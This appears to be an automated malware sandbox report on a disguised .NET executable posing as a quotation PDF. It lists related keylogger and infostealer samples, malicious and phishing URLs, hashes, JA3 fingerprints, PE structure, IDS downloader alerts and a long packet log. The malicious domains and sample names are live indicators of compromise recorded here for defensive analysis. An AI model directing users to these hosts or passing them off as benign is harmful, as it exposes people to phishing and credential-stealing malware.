	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	104.21.64.108
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://qwehikd-asdu.xyz/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://geminishdw-dws.top/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://geminiqwc-sw.top/	Get hash	malicious	Unknown	Browse	188.114.96.3
CLOUDFLARENETUS	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	450230549.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	64.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	450230549.exe	Get hash	malicious	Unknown	Browse	162.159.134.233
	PO-100001499.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	104.21.64.108
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://qwehikd-asdu.xyz/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://geminishdw-dws.top/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://geminiqwc-sw.top/	Get hash	malicious	Unknown	Browse	188.114.96.3
ORACLE-BMC-31898US	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	http://ec44d1ee.freyy.pages.dev/Zimbra%20Web%20Client%20Sign%20In/	Get hash	malicious	Unknown	Browse	147.154.16.196
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.130.0
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	450230549.exe	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	450230549.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	https://geminiqwc-sw.top/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://tiktok1688.cc/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://qwekorqw-eqo.top/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://qwoms-dei3.top/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://cmn.pkgu192.vip/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://frt.asan192.vip/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://tiktokshopxx.top/	Get hash	malicious	Unknown	Browse	188.114.97.3

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	2.725066233885776
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe
File size:	361'472 bytes
MD5:	631691dca7abc573a0cc911b2ddca40e
SHA1:	0ddc497bb233cda946e320378cde5e5cc507eb72
SHA256:	922ff7b2589cfa1d6a8dcd706bc294be4d4cb4d9baf02df5717d121097ab1859
SHA512:	4a94910b35a95038ba787095970ee32281011021f3cd33066bc8b350c2b1824e1f67a303492fbaae41e9872e75667325e3a4b8d759dce3a79105a00a09782dd9
SSDEEP:	768:BiHqbOcbd5LGOcccCM8AMx9m24IeGFfRhQg2ZzEjss2VSg1I1cn0sspAgpq8hLy8:oHqbbJGwrThRhQ7qPpqOLy0uyL+fS
TLSH:	9B743F1976B49132ED04CB7428F29E11C2E7EE5D2BE1921E25C8B66D1B326FD8F035C6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."......f............... ....@...... ....................................`...@......@............... .....

File Icon


Icon Hash:	0e3333b0bbb3b035

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F3BCB4 [Wed Sep 25 07:33:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa000	0x51aaa	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x6494	0x6600	2d608fbb5362c6929620a3cf71b7e840	False	0.45036764705882354	data	5.532781563761647	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa000	0x51aaa	0x51c00	c3f73acd94c48cdff4272b119e3ddd99	False	0.07137268253058104	data	2.3514408487511735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa370	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	0.7601351351351351
RT_ICON	0xa498	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832	0.7155963302752294
RT_ICON	0xa800	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.6826241134751773
RT_ICON	0xac68	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	0.5389784946236559
RT_ICON	0xaf50	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200	0.470679012345679
RT_ICON	0xbbf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4378517823639775
RT_ICON	0xcca0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	0.36402439024390243
RT_ICON	0xd308	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 7296	0.33110687022900764
RT_ICON	0xefb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.30881742738589213
RT_ICON	0x11558	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2560	0.2924174174174174
RT_ICON	0x11fc0	0x3228	Device independent bitmap graphic, 64 x 128 x 24, image size 12800	0.26580996884735203
RT_ICON	0x151e8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	0.24244213509683515
RT_ICON	0x19410	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.014139568600763382
RT_GROUP_ICON	0x5b438	0xbc	data	0.5797872340425532
RT_VERSION	0x5b4f4	0x3ca	data	0.4144329896907217
RT_MANIFEST	0x5b8c0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T09:23:21.173991+0200	2017962	ET MALWARE PE EXE or DLL Windows file download disguised as ASCII	1	188.114.97.3	443	192.168.2.6	49713	TCP
2024-09-26T09:23:21.173991+0200	2022640	ET MALWARE PE EXE or DLL Windows file download Text M2	1	188.114.97.3	443	192.168.2.6	49713	TCP
2024-09-26T09:24:08.120101+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49721	193.122.130.0	80	TCP
2024-09-26T09:24:08.916988+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49721	193.122.130.0	80	TCP
2024-09-26T09:24:09.511667+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49723	188.114.96.3	443	TCP
2024-09-26T09:24:10.088998+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49724	193.122.130.0	80	TCP
2024-09-26T09:24:11.182593+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49727	193.122.130.0	80	TCP
2024-09-26T09:24:12.846196+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49730	188.114.96.3	443	TCP
2024-09-26T09:24:14.010726+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49732	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:23:17.136116028 CEST	49710	80	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:17.141160011 CEST	80	49710	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:17.141263962 CEST	49710	80	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:17.143163919 CEST	49710	80	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:17.148108006 CEST	80	49710	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:17.800228119 CEST	80	49710	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:17.812596083 CEST	49711	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:17.812648058 CEST	443	49711	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:17.812725067 CEST	49711	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:17.854473114 CEST	49710	80	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:17.885476112 CEST	49711	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:17.885513067 CEST	443	49711	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:18.359325886 CEST	443	49711	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:18.359457016 CEST	49711	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:18.391016960 CEST	49711	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:18.391052008 CEST	443	49711	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:18.391554117 CEST	443	49711	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:18.432624102 CEST	49711	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:19.048492908 CEST	49711	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:19.091403008 CEST	443	49711	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:19.806668043 CEST	443	49711	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:19.806792021 CEST	443	49711	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:19.806848049 CEST	49711	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:19.825942993 CEST	49711	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:19.838089943 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:19.838139057 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:19.838207006 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:19.838618994 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:19.838630915 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:20.336760044 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:20.336935043 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:20.339198112 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:20.339206934 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:20.339565039 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:20.340924978 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:20.387394905 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.079103947 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.079245090 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.079313040 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.079339027 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.079443932 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.079492092 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.079503059 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.079611063 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.079658031 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.079668045 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.080205917 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.080261946 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.080269098 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.083601952 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.083674908 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.083677053 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.083702087 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.083741903 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.171190977 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.171288967 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.171329021 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.171351910 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.171381950 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.171436071 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.171444893 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.171499014 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.171531916 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.171540022 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.171586990 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.171622992 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.171627998 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.172277927 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.172310114 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.172323942 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.172329903 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.172363997 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.172386885 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.172451019 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.172493935 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.172498941 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.173167944 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.173203945 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.173213005 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.173227072 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.173261881 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.173268080 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.174021959 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.174060106 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.174067974 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.174084902 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.174119949 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.174124956 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.174144030 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.174180031 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.263642073 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.263746977 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.263787985 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.263797045 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.263819933 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.263854980 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.263855934 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.263865948 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.263906002 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.263915062 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.263994932 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.264703035 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.264750004 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.264760017 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.264771938 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.264811039 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.265161991 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.265217066 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.265284061 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.265336990 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.266063929 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.266124964 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.266189098 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.266237974 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.266310930 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.266360998 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.267080069 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.267115116 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.267144918 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.267157078 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.267173052 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.267884016 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.267935038 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.267946959 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.267987967 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.268007040 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.268054962 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.304238081 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.304364920 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.356247902 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.356367111 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.356383085 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.356400967 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.356446981 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.356494904 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.356537104 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.356591940 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.356632948 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.356969118 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.357023954 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.357063055 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.357110977 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.357187986 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.357234955 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.357484102 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.357537031 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.357677937 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.357728958 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.357852936 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.357902050 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.357942104 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.357991934 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.358459949 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.358510971 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.358562946 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.358612061 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.358764887 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.358815908 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.358846903 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.358896971 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.359442949 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.359523058 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.359605074 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.359653950 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.359736919 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.359787941 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.359814882 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.359863997 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.360394001 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.360446930 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.360548019 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.360599041 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.360861063 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.360913038 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.360955954 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.361002922 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.361232042 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.361284018 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.396846056 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.397016048 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.448419094 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.448530912 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.448559046 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.448575974 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.448589087 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.448616028 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.449002981 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.449012041 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.449032068 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.449059963 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.449067116 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.449100018 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.449120998 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.449398041 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.449436903 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.449441910 CEST	49713	443	192.168.2.6	188.114.97.3
